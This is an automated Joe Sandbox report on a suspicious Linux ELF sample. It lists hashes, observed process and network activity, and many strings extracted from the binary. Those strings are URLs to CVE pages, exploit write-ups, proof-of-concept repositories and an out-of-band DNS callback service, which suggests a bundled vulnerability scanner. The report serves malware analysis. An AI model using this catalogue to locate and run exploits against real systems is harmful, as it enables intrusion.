Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:na.elf
Analysis ID:1532417
MD5:3539f5a048708ba8ae4ba0548538a769
SHA1:fdffcbdae30e43e104fe372d4db58f4a61237bec
SHA256:bc3e7c9378af55ad1000c721319b723e58543c1cb9d7aa6be2868a171fa89689
Tags:elfuser-abuse_ch
Infos:

Detection

Score:21
Range:0 - 100
Whitelisted:false

Signatures

Sample contains AV-related strings
Executes the "systemctl" command used for controlling the systemd system and service manager
Reads system version information

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1532417
Start date and time:2024-10-13 07:03:27 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 10m 53s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:na.elf
Detection:SUS
Classification:sus21.evad.linELF@0/0@2/0
Cookbook Comments:
  • Analysis time extended to 480s due to sleep detection in submitted sample
  • Max analysis timeout: 600s exceeded, the analysis took too long
Command:/tmp/na.elf
PID:5698
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • systemd New Fork (PID: 5736, Parent: 1)
  • snap-failure (PID: 5736, Parent: 1, MD5: 69136a7d575731ce62349f2e4d3e5c36) Arguments: /usr/lib/snapd/snap-failure snapd
    • systemctl (PID: 5755, Parent: 5736, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl stop snapd.socket
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: na.elfString found in binary or memory: http://%s.%sillegal
Source: na.elfString found in binary or memory: http://0day5.com/archives/1173/name:
Source: na.elfString found in binary or memory: http://0day5.com/archives/4249/
Source: na.elfString found in binary or memory: http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A8
Source: na.elfString found in binary or memory: http://127.0.0.1:8080in
Source: na.elfString found in binary or memory: http://127.0.0.1:8080sk-ecdsa-sha2-nistp256-cert-v01
Source: na.elfString found in binary or memory: http://127.0.0.1:id:
Source: na.elfString found in binary or memory: http://127.1.1.1:700
Source: na.elfString found in binary or memory: http://airflow.apache.org/
Source: na.elfString found in binary or memory: http://api.ceye.io/v1/records?token=%s&type=dns&filter=%snon-Go
Source: na.elfString found in binary or memory: http://baidu.com/api/v1/targets/?test.yml
Source: na.elfString found in binary or memory: http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html
Source: na.elfString found in binary or memory: http://ckeditor.com
Source: na.elfString found in binary or memory: http://cve-2018-7600-8-x.vulnet:8080/
Source: na.elfString found in binary or memory: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770
Source: na.elfString found in binary or memory: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16313
Source: na.elfString found in binary or memory: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9757
Source: na.elfString found in binary or memory: http://developer.joomla.org/security-centre/628-20151001-core-sql-injection.html
Source: na.elfString found in binary or memory: http://foreversong.cn/archives/1378
Source: na.elfString found in binary or memory: http://forum.panabit.com/thread-10830-1-1.htmlNCHARNUMBERSB1FLOATNullStrVarNumLONGVARCHARROWIDDATEVa
Source: na.elfString found in binary or memory: http://github.com/hackgov)
Source: na.elfString found in binary or memory: http://jellyfin.org
Source: na.elfString found in binary or memory: http://localhost/ueditor/net/controller.ashx?action=catchimage&encode=utf-8
Source: na.elfString found in binary or memory: http://luckyzmj.cn/posts/15dff4d3.html
Source: na.elfString found in binary or memory: http://luckyzmj.cn/posts/15dff4d3.htmlname:
Source: na.elfString found in binary or memory: http://print1n.top)
Source: na.elfString found in binary or memory: http://webkiller.cn/)
Source: na.elfString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E4%B8%89%E
Source: na.elfString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E8%BF%88%E
Source: na.elfString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E
Source: na.elfString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%
Source: na.elfString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8
Source: na.elfString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E6%B3%9B%E5%BE%AEOA/%E6%B3
Source: na.elfString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94
Source: na.elfString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E4%B8%AD%E5%88%9B%E8%A7%8
Source: na.elfString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%AE%89%E7%BE%8E%E6%95%B
Source: na.elfString found in binary or memory: http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E6%B7%B1%E4%BF%A1%E6%9C%8
Source: na.elfString found in binary or memory: http://wiki.peiqi.tech/wiki/iot/HIKVISION/HIKVISION%20%E8%A7%86%E9%A2%91%E7%BC%96%E7%A0%81%E8%AE%BE%
Source: na.elfString found in binary or memory: http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A8%20status.jsp%20%E4%BF%
Source: na.elfString found in binary or memory: http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B
Source: na.elfString found in binary or memory: http://wiki.peiqi.tech/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.7%20auth_mobi.php%20%
Source: na.elfString found in binary or memory: http://wiki.peiqi.tech/wiki/webapp/AtlassianConfluence/Atlassian%20Confluence%20OGNL%E6%B3%A8%E5%85%
Source: na.elfString found in binary or memory: http://wiki.xypbk.com/IOT%E5%AE%89%E5%85%A8/ZeroShell/ZeroShell%203.9.0%20%E8%BF%9C%E7%A8%8B%E5%91%B
Source: na.elfString found in binary or memory: http://wiki.xypbk.com/Web%E5%AE%89%E5%85%A8/%E7%BD%91%E5%BA%B7%20NS-ASG%E5%AE%89%E5%85%A8%E7%BD%91%E
Source: na.elfString found in binary or memory: http://www-3.ibm.com/services/uddi/inquiryapi
Source: na.elfString found in binary or memory: http://www-3.ibm.com/services/uddi/v2beta/inquiryapi
Source: na.elfString found in binary or memory: http://www.bt.cn/bbs)Remote
Source: na.elfString found in binary or memory: http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315name:
Source: na.elfString found in binary or memory: http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-1728
Source: na.elfString found in binary or memory: http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202003-181
Source: na.elfString found in binary or memory: http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202012-1548
Source: na.elfString found in binary or memory: http://www.cnxunchi.com
Source: na.elfString found in binary or memory: http://www.ctfiot.com/13682.html
Source: na.elfString found in binary or memory: http://www.dedeyuan.com/xueyuan/wenti/1244.html
Source: na.elfString found in binary or memory: http://www.iwantacve.cn/index.php/archives/311/
Source: na.elfString found in binary or memory: http://www.lmxspace.com/)
Source: na.elfString found in binary or memory: http://www.polaris-lab.com/index.php/archives/253/
Source: na.elfString found in binary or memory: http://www.rejetto.com/hfs/)
Source: na.elfString found in binary or memory: http://www.tongda2000.com
Source: na.elfString found in binary or memory: http://www.tp-shop.cn
Source: na.elfString found in binary or memory: http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%
Source: na.elfString found in binary or memory: http://www.xdoa.cn
Source: na.elfString found in binary or memory: http://wx.weaver)(
Source: na.elfString found in binary or memory: http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0150742
Source: na.elfString found in binary or memory: https://bbs.secnet.cn/post/t-30
Source: na.elfString found in binary or memory: https://blog.51cto.com/13770310/2156663
Source: na.elfString found in binary or memory: https://blog.csdn.net/DFMASTER/article/details/108547352
Source: na.elfString found in binary or memory: https://blog.csdn.net/caiqiiqi/article/details/112005424
Source: na.elfString found in binary or memory: https://blog.csdn.net/dfdhxb995397/article/details/101385340
Source: na.elfString found in binary or memory: https://blog.csdn.net/fnmsd)
Source: na.elfString found in binary or memory: https://blog.csdn.net/fnmsd/article/details/88657083
Source: na.elfString found in binary or memory: https://blog.csdn.net/fnmsd/article/details/89235589name:
Source: na.elfString found in binary or memory: https://blog.csdn.net/ge00111/article/details/72765210name:
Source: na.elfString found in binary or memory: https://blog.csdn.net/god_7z1/article/details/8180454
Source: na.elfString found in binary or memory: https://blog.csdn.net/qq_36374896/article/details/84839891
Source: na.elfString found in binary or memory: https://blog.csdn.net/qq_36923426/article/details/111361158
Source: na.elfString found in binary or memory: https://blog.csdn.net/qq_41503511/article/details/116274406
Source: na.elfString found in binary or memory: https://blog.csdn.net/u012206617/article/details/109107210
Source: na.elfString found in binary or memory: https://blog.csdn.net/weixin_39779975/article/details/111091529
Source: na.elfString found in binary or memory: https://blog.csdn.net/weixin_40709439/article/details/82780606
Source: na.elfString found in binary or memory: https://blog.csdn.net/weixin_42633229/article/details/117070546name:
Source: na.elfString found in binary or memory: https://blog.csdn.net/weixin_44578334/article/details/110917053
Source: na.elfString found in binary or memory: https://blog.csdn.net/xuandao_ahfengren/article/details/111402955
Source: na.elfString found in binary or memory: https://blog.csdn.net/ystyaoshengting/article/details/82734888name:
Source: na.elfString found in binary or memory: https://blog.csdn.net/zy15667076526/article/details/111413979
Source: na.elfString found in binary or memory: https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
Source: na.elfString found in binary or memory: https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
Source: na.elfString found in binary or memory: https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
Source: na.elfString found in binary or memory: https://blog.star7th.com/2016/05/2007.htmlname:
Source: na.elfString found in binary or memory: https://blog.unauthorizedaccess.nl/2020/07/07/adventures-in-citrix-security-research.html
Source: na.elfString found in binary or memory: https://buaq.net/go-53721.html
Source: na.elfString found in binary or memory: https://bugs.shuimugan.com/bug/view?bug_no=0108235
Source: na.elfString found in binary or memory: https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb
Source: na.elfString found in binary or memory: https://cert.360.cn/warning/detail?id=fba518d5fc5c4ed4ebedff1dab24caf2
Source: na.elfString found in binary or memory: https://cloud.tencent.com/developer/article/1472550
Source: na.elfString found in binary or memory: https://cloud.tencent.com/developer/news/312276
Source: na.elfString found in binary or memory: https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
Source: na.elfString found in binary or memory: https://confluence.atlassian.com/jira/jira-security-advisory-2019-07-10-973486595.html
Source: na.elfString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1871name:
Source: na.elfString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10736
Source: na.elfString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10737
Source: na.elfString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10738
Source: na.elfString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14179
Source: na.elfString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5284name:
Source: na.elfString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9376
Source: na.elfString found in binary or memory: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019
Source: na.elfString found in binary or memory: https://cwiki.apache.org/confluence/display/AMBARI/Quick
Source: na.elfString found in binary or memory: https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
Source: na.elfString found in binary or memory: https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/
Source: na.elfString found in binary or memory: https://dmaasland.github.io/posts/citrix.html
Source: na.elfString found in binary or memory: https://docs.influxdata.com/influxdb/v1.7/tools/api/name:
Source: na.elfString found in binary or memory: https://docs.min.io/cn/
Source: na.elfString found in binary or memory: https://edr.sangfor.com.cn/
Source: na.elfString found in binary or memory: https://exp1orer.github.io
Source: na.elfString found in binary or memory: https://fengchenzxc.github.io/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6
Source: na.elfString found in binary or memory: https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9d
Source: na.elfString found in binary or memory: https://git.sp0re.sh/sp0re/Nhttpd-exploits
Source: na.elfString found in binary or memory: https://gitee.com/ComsenzDiscuz/DiscuzX/issues/IPRUI
Source: na.elfString found in binary or memory: https://github.com/0x-zmz
Source: na.elfString found in binary or memory: https://github.com/2357000166)
Source: na.elfString found in binary or memory: https://github.com/Aiminsun/CVE-2021-36260
Source: na.elfString found in binary or memory: https://github.com/Aquilao)
Source: na.elfString found in binary or memory: https://github.com/B1anda0)
Source: na.elfString found in binary or memory: https://github.com/CouchCMS/CouchCMS/issues/46
Source: na.elfString found in binary or memory: https://github.com/Facker007)
Source: na.elfString found in binary or memory: https://github.com/FiveAourThe)
Source: na.elfString found in binary or memory: https://github.com/For3stCo1d)
Source: na.elfString found in binary or memory: https://github.com/IsaacQiang)
Source: na.elfString found in binary or memory: https://github.com/Jarcis-cy)
Source: na.elfString found in binary or memory: https://github.com/JcQSteven/blog/issues/18
Source: na.elfString found in binary or memory: https://github.com/JrDw0/)
Source: na.elfString found in binary or memory: https://github.com/LandGrey/SpringBootVulExploit
Source: na.elfString found in binary or memory: https://github.com/LandGrey/flink-unauth-rce
Source: na.elfString found in binary or memory: https://github.com/Loneyers)
Source: na.elfString found in binary or memory: https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write
Source: na.elfString found in binary or memory: https://github.com/Loneyers/vuldocker/tree/master/next.js
Source: na.elfString found in binary or memory: https://github.com/Loneyers/vuldocker/tree/master/spring/CVE-2019-3799
Source: na.elfString found in binary or memory: https://github.com/MaxSecurity)
Source: na.elfString found in binary or memory: https://github.com/Medicean/VulApps/tree/master/w/wordpress/2
Source: na.elfString found in binary or memory: https://github.com/Mr-xn/spring-core-rce
Source: na.elfString found in binary or memory: https://github.com/Mr-xn/spring-core-rcename:
Source: na.elfString found in binary or memory: https://github.com/MrPointSun)
Source: na.elfString found in binary or memory: https://github.com/NS-Sp4ce/Inspur
Source: na.elfString found in binary or memory: https://github.com/PR3R00T/CVE-2020-8193-Citrix-Scanner/blob/master/scanner.py
Source: na.elfString found in binary or memory: https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%8
Source: na.elfString found in binary or memory: https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%B
Source: na.elfString found in binary or memory: https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%B
Source: na.elfString found in binary or memory: https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/%E6%B7%B1%E4%BF%A1%E6%9C%8D/%E6
Source: na.elfString found in binary or memory: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%
Source: na.elfString found in binary or memory: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/PeiQi/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%
Source: na.elfString found in binary or memory: https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_W
Source: na.elfString found in binary or memory: https://github.com/PickledFish)
Source: na.elfString found in binary or memory: https://github.com/Print1n)
Source: na.elfString found in binary or memory: https://github.com/Sndav)
Source: na.elfString found in binary or memory: https://github.com/Soveless)
Source: na.elfString found in binary or memory: https://github.com/Sup3rm4nx0x)
Source: na.elfString found in binary or memory: https://github.com/ThestaRY7/)
Source: na.elfString found in binary or memory: https://github.com/WhiteHSBG)
Source: na.elfString found in binary or memory: https://github.com/Y4er/Y4er.com/blob/15f49973707f9d526a059470a074cb6e38a0e1ba/content/post/weiphp-e
Source: na.elfString found in binary or memory: https://github.com/ab1gale/phpcms-2008-CVE-2018-19127
Source: na.elfString found in binary or memory: https://github.com/abcRosexyz)
Source: na.elfString found in binary or memory: https://github.com/alibaba/druid
Source: na.elfString found in binary or memory: https://github.com/alibaba/nacos/issues/4593
Source: na.elfString found in binary or memory: https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/
Source: na.elfString found in binary or memory: https://github.com/betta-cyber)
Source: na.elfString found in binary or memory: https://github.com/bufsnake)
Source: na.elfString found in binary or memory: https://github.com/canc3s)
Source: na.elfString found in binary or memory: https://github.com/cc8ci)
Source: na.elfString found in binary or memory: https://github.com/chaosec2021
Source: na.elfString found in binary or memory: https://github.com/dahua966/)
Source: na.elfString found in binary or memory: https://github.com/dem0ns)
Source: na.elfString found in binary or memory: https://github.com/dem0ns/improper
Source: na.elfString found in binary or memory: https://github.com/dem0ns/improper/tree/master/laravel/5_debug
Source: na.elfString found in binary or memory: https://github.com/dreadlocked/Drupalgeddon2
Source: na.elfString found in binary or memory: https://github.com/evi1code/Just-for-fun/issues/2
Source: na.elfString found in binary or memory: https://github.com/ffay/lanproxy/issues/152
Source: na.elfString found in binary or memory: https://github.com/fnmsd)
Source: na.elfString found in binary or memory: https://github.com/fuzz7j)
Source: na.elfString found in binary or memory: https://github.com/goharbor/harbor/issues/8951
Source: na.elfString found in binary or memory: https://github.com/ha9worm)
Source: na.elfString found in binary or memory: https://github.com/hackgov)
Source: na.elfString found in binary or memory: https://github.com/hanxiansheng26)
Source: na.elfString found in binary or memory: https://github.com/harris2015)
Source: na.elfString found in binary or memory: https://github.com/ianxtianxt/Pyspider-webui-poc
Source: na.elfString found in binary or memory: https://github.com/imjdl/CVE-2020-8515-PoC
Source: na.elfString found in binary or memory: https://github.com/immunIT/CVE-2018-11759
Source: na.elfString found in binary or memory: https://github.com/j4ckzh0u)
Source: na.elfString found in binary or memory: https://github.com/jamieparfet/Apache-OFBiz-XXE/blob/master/exploit.py
Source: na.elfString found in binary or memory: https://github.com/jas502n/CVE-2019-11510-1
Source: na.elfString found in binary or memory: https://github.com/jas502n/CVE-2019-6340
Source: na.elfString found in binary or memory: https://github.com/jinqi520
Source: na.elfString found in binary or memory: https://github.com/jujumanman)
Source: na.elfString found in binary or memory: https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh
Source: na.elfString found in binary or memory: https://github.com/jweny)
Source: na.elfString found in binary or memory: https://github.com/kmahyyg)
Source: na.elfString found in binary or memory: https://github.com/knqyf263/CVE-2019-6340
Source: na.elfString found in binary or memory: https://github.com/kongxin520/DedeCMS/blob/master/DedeCMS_5.7_Bug.mdname:
Source: na.elfString found in binary or memory: https://github.com/kzaopa)
Source: na.elfString found in binary or memory: https://github.com/last0monster)
Source: na.elfString found in binary or memory: https://github.com/masahiro331/CVE-2019-10758
Source: na.elfString found in binary or memory: https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse
Source: na.elfString found in binary or memory: https://github.com/mpgn/CVE-2018-11686
Source: na.elfString found in binary or memory: https://github.com/mstxq17/CodeCheck/
Source: na.elfString found in binary or memory: https://github.com/mumu0215)
Source: na.elfString found in binary or memory: https://github.com/neal1991)
Source: na.elfString found in binary or memory: https://github.com/neverendxxxxxx)
Source: na.elfString found in binary or memory: https://github.com/notwhy)
Source: na.elfString found in binary or memory: https://github.com/nu0l)
Source: na.elfString found in binary or memory: https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E8%9D%B6OA%20server_file%20%E7%9B%AE%E5%BD%95%E
Source: na.elfString found in binary or memory: https://github.com/opsxcq/exploit-CVE-2014-6271name:
Source: na.elfString found in binary or memory: https://github.com/projectzeroindia/CVE-2019-11510name:
Source: na.elfString found in binary or memory: https://github.com/prometheus/prometheus/security/advisories/GHSA-vx57-7f4q-fpc7
Source: na.elfString found in binary or memory: https://github.com/pululin)
Source: na.elfString found in binary or memory: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/apache_ofbiz_
Source: na.elfString found in binary or memory: https://github.com/rapid7/metasploit-framework/pull/13807/files
Source: na.elfString found in binary or memory: https://github.com/rconfig/rconfig/commit/6ea92aa307e20f0918ebd18be9811e93048d5071
Source: na.elfString found in binary or memory: https://github.com/security-kma/EXPLOITING-CVE-2019-14205
Source: na.elfString found in binary or memory: https://github.com/shadown1ng)
Source: na.elfString found in binary or memory: https://github.com/shadown1ng)name:
Source: na.elfString found in binary or memory: https://github.com/shmilylty)
Source: na.elfString found in binary or memory: https://github.com/spring-cloud/spring-cloud-configname:
Source: na.elfString found in binary or memory: https://github.com/star7th/showdoc/pull/1059
Source: na.elfString found in binary or memory: https://github.com/star7th/showdoc/pull/1059name:
Source: na.elfString found in binary or memory: https://github.com/tangxiaofeng7)
Source: na.elfString found in binary or memory: https://github.com/th3gundy/CVE-2019-7192_QNAP_Exploit
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.mdname:
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/blob/master/kibana/CVE-2018-17246/README.md
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/blob/master/laravel/CVE-2021-3129
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-16846/README.zh-cn.md
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/activemq/CVE-2016-3088
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861name:
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396name:
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/discuz/wooyun-2010-080723
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/django/CVE-2018-14574
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/docker/unauthorized-rce
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2014-3704name:
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/ecshop/collection_list-sqli
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-1427name:
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-3337
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533name:
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/glassfish/4.1.0name:
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/h2database/h2-console-unacc
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2017-8917name:
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/php/CVE-2012-1823name:
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/phpunit/CVE-2017-9841name:
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/rails/CVE-2018-3760
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/spark/unaccAn
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/spring/CVE-2016-4977
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rcename:
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/uwsgi/CVE-2018-7490name:
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/webmin/CVE-2019-15107
Source: na.elfString found in binary or memory: https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134name:
Source: na.elfString found in binary or memory: https://github.com/whami-root)
Source: na.elfString found in binary or memory: https://github.com/whami-rootname:
Source: na.elfString found in binary or memory: https://github.com/whwlsfb)
Source: na.elfString found in binary or memory: https://github.com/wulalalaaa)
Source: na.elfString found in binary or memory: https://github.com/wuzhicms/wuzhicms/issues/184
Source: na.elfString found in binary or memory: https://hackfun.org/)
Source: na.elfString found in binary or memory: https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3
Source: na.elfString found in binary or memory: https://hub.docker.com/r/petergrace/opentsdb-docker
Source: na.elfString found in binary or memory: https://hub.docker.com/r/petergrace/opentsdb-dockername:
Source: na.elfString found in binary or memory: https://idc.wanyunshuju.com/aqld/2123.htmlname:
Source: na.elfString found in binary or memory: https://imlonghao.com/)
Source: na.elfString found in binary or memory: https://infosecdb.wordpress.com/2020/01/05/gilacms-1-11-8-admin-sqlquery-sql-injection/
Source: na.elfString found in binary or memory: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
Source: na.elfString found in binary or memory: https://jira.atlassian.com/browse/JRASERVER-69793
Source: na.elfString found in binary or memory: https://kb.cert.org/vuls/id/843464name:
Source: na.elfString found in binary or memory: https://lists.apache.org/thread.html/r84ccbfc67bfddd35dced494a1f1cba504f49ac60a2a2ae903c5492c3%40%3C
Source: na.elfString found in binary or memory: https://localhost/index.php/Home/uploadify/fileList?type=.
Source: na.elfString found in binary or memory: https://lorexxar.cn)
Source: na.elfString found in binary or memory: https://max.book118.com/html/2017/0623/117514590.shtmname:
Source: na.elfString found in binary or memory: https://medium.com/
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPwname:
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/3MkN4ZuUYpP2GgPbTzrxbA
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/3bI7v-hv4rMUnCIT0GLkJA
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/3t7r7FCirDEAsXcf2QMomw
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/6phWjDrGG0pCpGuCdLusIg
Source: na.elfString found in binary or memory: https://mp.weixin.qq.com/s/F-M21PT0xn9QOuwoC8llKAname:
